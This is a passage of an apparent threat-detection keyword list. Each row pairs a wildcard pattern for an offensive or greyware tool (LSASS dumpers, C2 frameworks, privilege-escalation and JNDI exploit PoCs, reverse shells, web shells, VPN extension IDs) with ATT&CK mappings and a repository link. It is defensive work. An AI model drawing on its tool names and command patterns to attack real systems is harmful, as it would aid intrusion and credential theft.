- T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,0,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z -*irs.exe exec*,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,0,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z -*irs.exe list*,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,0,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z -*irs.exe list*,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,0,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z -*irsl/curlshell*,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,1,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*is_kirbi_file*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*is_proxy_stub_dll_loaded*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*isShellcodeThread*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*issue_shell_whoami*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*Itay Migdal*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*itm4n/PrintSpoofer*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*itm4n/PrintSpoofer*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*itm4n/PrivescCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*itm4nprivesc*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*its-a-feature/Apfell*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*its-a-feature/Mythic*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*its-a-feature/Mythic*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*itsKindred*,offensive_tool_keyword,Github Username,gthub username hosting malware samples and exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/itsKindred,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ItsNee/Follina-CVE-2022-30190-POC*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/ItsNee/Follina-CVE-2022-30190-POC,1,1,N/A,N/A,1,5,0,2022-07-04T13:27:13Z,2022-06-05T13:54:04Z -*itunes_backup2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*itwasalladream -u * -p * -d *,offensive_tool_keyword,ItWasAllADream,A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE,T1046 - T1210.002 - T1047,TA0007 - TA0002,N/A,N/A,Discovery,https://github.com/byt3bl33d3r/ItWasAllADream,1,0,N/A,7,8,738,118,2023-08-25T16:11:40Z,2021-07-05T20:13:49Z -*itwasalladream*bogus.dll*,offensive_tool_keyword,ItWasAllADream,A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE,T1046 - T1210.002 - T1047,TA0007 - TA0002,N/A,N/A,Discovery,https://github.com/byt3bl33d3r/ItWasAllADream,1,0,N/A,7,8,738,118,2023-08-25T16:11:40Z,2021-07-05T20:13:49Z -*ItWasAllADream-master*,offensive_tool_keyword,ItWasAllADream,A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE,T1046 - T1210.002 - T1047,TA0007 - TA0002,N/A,N/A,Discovery,https://github.com/byt3bl33d3r/ItWasAllADream,1,1,N/A,7,8,738,118,2023-08-25T16:11:40Z,2021-07-05T20:13:49Z -*IUnknownObj.cpp*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,0,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*Ivy_1*_darwin_amd64*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*Ivy_1*_linux_amd64*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*Ivy_1*_windows_amd64.exe*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*Ivy-main.zip*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,1,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*iwork2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*JAB4ACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAG4AYQBtAGUAOwAgACIAJABwAGkAZAAgACQAeAAuAGUAeABlACIA*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*jackdaw --*,offensive_tool_keyword,jackdaw,Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.,T1595 T1590 T1591,TA0001 - TA0002 - TA0007 - TA0008 - TA0011,N/A,N/A,Reconnaissance,https://github.com/skelsec/jackdaw,1,0,N/A,N/A,6,532,88,2023-07-19T16:21:49Z,2019-03-27T18:36:41Z -*jackdaw.py*,offensive_tool_keyword,jackdaw,Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.,T1595 T1590 T1591,TA0001 - TA0002 - TA0007 - TA0008 - TA0011,N/A,N/A,Reconnaissance,https://github.com/skelsec/jackdaw,1,1,N/A,N/A,6,532,88,2023-07-19T16:21:49Z,2019-03-27T18:36:41Z -*jackit --reset --debug*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*jaeles scan -s bigip-cve-2020-5902.yaml -U https_url.txt*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*jajilbjjinjmgcibalaakngmkilboobh*,greyware_tool_keyword,Astar VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jas502n/bypassAV*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/jas502n/bypassAV-1,1,1,N/A,10,10,18,9,2021-03-04T01:51:14Z,2021-03-03T11:33:38Z -*jas502n/CVE-2020-5902*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jas502n/CVE-2020-5902,1,0,N/A,N/A,4,377,112,2021-10-13T07:53:46Z,2020-07-05T16:38:32Z -*jatayu.php*,offensive_tool_keyword,Jatayu,Stealthy Stand Alone PHP Web Shell,T1071,TA0005,N/A,N/A,Shell spawning,https://github.com/SpiderMate/Jatayu,1,1,N/A,N/A,1,31,8,2019-09-12T17:03:13Z,2019-09-12T09:04:10Z -*jatayu-image.png*,offensive_tool_keyword,Jatayu,Stealthy Stand Alone PHP Web Shell,T1071,TA0005,N/A,N/A,Shell spawning,https://github.com/SpiderMate/Jatayu,1,1,N/A,N/A,1,31,8,2019-09-12T17:03:13Z,2019-09-12T09:04:10Z -*java -jar BeaconTool.jar*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,0,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*java/jndi/LDAPRefServer.java*,offensive_tool_keyword,POC,JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.,T1190 - T1133 - T1595 - T1132 - T1046 - T1041,TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001,N/A,N/A,Exploitation tools,https://github.com/welk1n/JNDI-Injection-Exploit,1,1,N/A,N/A,10,2331,715,2023-03-22T21:23:32Z,2019-10-10T01:53:49Z -*java-deserialization-exploits*,offensive_tool_keyword,java-deserialization-exploits,A collection of curated Java Deserialization Exploits,T1029 - T1529 - T1569 - T1218,TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Coalfire-Research/java-deserialization-exploits,1,0,N/A,N/A,6,583,263,2021-05-16T23:10:49Z,2016-05-31T16:23:08Z -*javascript-obfuscator*,offensive_tool_keyword,javascript-obfuscator,JavaScript Obfuscator is a powerful free obfuscator for JavaScript. containing a variety of features which provide protection for your source code.,T1027,TA0010,N/A,N/A,Defense Evasion,https://github.com/javascript-obfuscator/javascript-obfuscator,1,0,N/A,N/A,10,11761,1384,2023-09-05T17:32:26Z,2016-05-09T08:16:53Z -*jbnmpdkcfkochpanomnkhnafobppmccn*,greyware_tool_keyword,apkfold free vpn,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jboss_jmx_upload_exploit*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*jdgilggpfmjpbodmhndmhojklgfdlhob*,greyware_tool_keyword,Browser VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jdk*-activator-rce-test.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*jdk*-call-rce-test.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*jdk*-dgc-rce-test.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*jdk*-method-rce-test.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*jdk*-reg-bypass.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*jdwp-shellifier.py -t * -p * --cmd *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*jedieiamjmoflcknjdjhpieklepfglin*,greyware_tool_keyword,FastestVPN Proxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jedisct1*,offensive_tool_keyword,Github Username,github username. a knack for cryptography. computer vision. opensource software and infosec. hosting infosec tools used by pentester,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/jedisct1,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*jfjallid/go-secdump*,offensive_tool_keyword,go-secdump,Tool to remotely dump secrets from the Windows registry,T1003.002 - T1012 - T1059.003,TA0006 - TA0003 - TA0002,N/A,N/A,Credential Access,https://github.com/jfjallid/go-secdump,1,1,N/A,10,1,81,7,2023-05-02T15:01:10Z,2023-02-23T17:02:50Z -*jgbaghohigdbgbolncodkdlpenhcmcge*,greyware_tool_keyword,Free VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*JGillam/burp-co2*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*Jira-Lens.py*,offensive_tool_keyword,Jira-Lens,Fast and customizable vulnerability scanner For JIRA written in Python,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/MayankPandey01/Jira-Lens,1,1,N/A,N/A,3,206,31,2022-08-23T09:57:52Z,2021-11-14T18:37:47Z -*jliodmnojccaloajphkingdnpljdhdok*,greyware_tool_keyword,Turbo VPN for PC,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jljopmgdobloagejpohpldgkiellmfnc*,greyware_tool_keyword,PP VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jmmcatee/cracklord*,offensive_tool_keyword,cracklord,Queue and resource system for cracking passwords,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/jmmcatee/cracklord,1,1,N/A,10,4,377,74,2022-09-22T09:30:14Z,2013-12-09T23:10:54Z -*JMousqueton/PoC-CVE-2022-30190*,offensive_tool_keyword,POC,POC CVE-2022-30190 CVE 0-day MS Offic RCE aka msdt follina,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/JMousqueton/PoC-CVE-2022-30190,1,1,N/A,N/A,2,149,58,2022-06-05T21:06:13Z,2022-05-30T18:17:38Z -*jndi_injection.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*JNDI-Injection-Exploit*,offensive_tool_keyword,POC,JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.,T1190 - T1133 - T1595 - T1132 - T1046 - T1041,TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001,N/A,N/A,Exploitation tools,https://github.com/welk1n/JNDI-Injection-Exploit,1,1,N/A,N/A,10,2331,715,2023-03-22T21:23:32Z,2019-10-10T01:53:49Z -*Job killed and console drained*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 